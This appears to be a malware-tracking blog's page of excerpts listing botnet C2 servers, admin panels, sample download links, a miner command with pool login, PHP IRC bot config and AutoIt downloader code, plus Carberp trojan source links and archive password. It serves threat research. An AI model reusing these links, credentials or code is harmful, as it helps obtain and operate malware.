Sample: hxxp://darknode.net/Mining.exe
Miner command line: coin-miner.exe -a sha256 -o hxxp://brucegregory_bot:x@us.eclipsemc.com:8337 -T 83 -l yes -t 1
Hosting infos: http://whois.domaintools.com/67.14.164.114
37.221.170.195 (PHP bots hosted in Germany, Frankfurt Am Main, Voxility S.r.l.)
Found by Yewnix

<?
set_time_limit(0);
error_reporting(0);
class Anxiety {
    var $config = array(
        "server"   => "37.221.170.195", // Server IP Address
        "port"     => 443,
        "pass"     => "",               // Server Password
        "prefix"   => "[r00t]-",
        "maxrand"  => 3,
        "chan"     => "#exploit",       // Channel
        "key"      => "lolmoney",       // Channel Key
        "modes"    => "+p",
        "password" => "lolmoney",       // Bot Password
        "trigger"  => ".",
        "hostauth" => "anxiety.gov"     // * For Any Hostname
        //Leave all of this shit down here alone, unless you know what…
Carberp The Banking Trojan Source Now Available To Public
First Zeus, now Carberp: the source has been leaked to the public.
(Picture from dk forum)
The source and the password for the rar archive are available via Twitter, thanks to ivanlef0u. Another link for the source is here (around 1.88 GB).
Password for the archive: “Kj1#w2*LadiOQpw3oi029)K Oa(28)uspeh”
175.41.29.181 (Pony hosted in Hong Kong, Hong Kong, Unit 1702 Ramada Tower)
Admin Panel: 175.41.29.181/pfx/admin.php
The rest of the files are here: hxxp://175.41.29.181/pfx/ (setup.php is still in this folder)
Pony sample: hxxp://175.41.29.181/pn1.exe
Hosting infos: http://whois.domaintools.com/175.41.29.181
srv1.su (snk’s botnet hosted in Luxembourg, Steinsel, Root Sa)
The bot is downloaded by this AutoIt sample: hxxp://sglegacy.com/AA/dava.exe, which looks like an HTTP AutoIt downloader.
Login here: hxxp://www.sglegacy.com/AA/index.php/login
Another sample downloaded by dava.exe is this: hxxp://la-majeur.com/images/beta.exe (Betabot)
Here is dava.exe decompiled:

$at2 = "0"
$at5 = 0
$at1 = "0"
$at3 = "0"
$avm = "0"
$asb = "0"
$at4 = "0"
#NoTrayIcon
#Region
#AutoIt3Wrapper_UseUpx=n
…
belakey.com (Pony hosted in Germany, Gunzenhausen, Osauhing Future Technologies)
Resolved: [belakey.com] to [46.4.199.232]
Pony Gate: belakey.com/pony/gate.php
Admin Panel: hxxp://belakey.com/pony/admin.php
Sample: hxxp://188.40.33.69/z/pony4.exe
Hosting infos: http://whois.domaintools.com/46.4.199.232
thinkgreensupply.com (Pony hosted in United States, Portland, Directspace Networks Llc.)
Resolved: [thinkgreensupply.com] to [174.140.168.239]
Admin Panel: hxxp://thinkgreensupply.com/ponyb/admin.php
Gate: hxxp://thinkgreensupply.com/ponyb/gate.php
Hosting infos: http://whois.domaintools.com/174.140.168.239
vkdsfh9ifiuhi.info (Andromeda HTTP botnet hosted in Netherlands, Haarlem, Fiberring B.v.)
HTTP Requests: hxxp://TelevisionHunter.com/new/gate.php
Downloads this file: vkdsfh9ifiuhi.info/mojo/art.jpg
Plugins: hxxp://cardpalooza.su/rk.mod, hxxp://dijitalledtabela.com/bd3.mod
Other domains: lnx-games.su
rk.mod here: http://cur.lv/14hlg
bd3.mod here: http://cur.lv/14hlx
Hosting infos: http://whois.domaintools.com/87.255.51.229
kalurjaq.ru (Kelihos hosted in Kazakhstan, Almaty, Jsc Almatv)
Kelihos (also known as Hlux) is a spambot with the capability to steal credentials from the victim’s computer and drop additional malware. While the old version used the second-level domain cz.cc for its distribution and to control the botnet, the new version takes advantage of the .eu TLD in combination with fast-flux techniques. HTTP…
z.joerv02.com (IRC botnet hosted in China, Nanjing, Chinanet Jiangsu Province Network)
Name              Query Type   Query Result    Successful  Protocol
api.wipmania.com  DNS_TYPE_A   69.197.137.58   YES         udp
z.baerr02.com     DNS_TYPE_A                   NO          udp
z.joerv02.com     DNS_TYPE_A   58.221.60.87    YES         udp

Server: z.joerv02.com:6513
PASS smart
Channels: #dpi,#suk.#sar
PASS smart…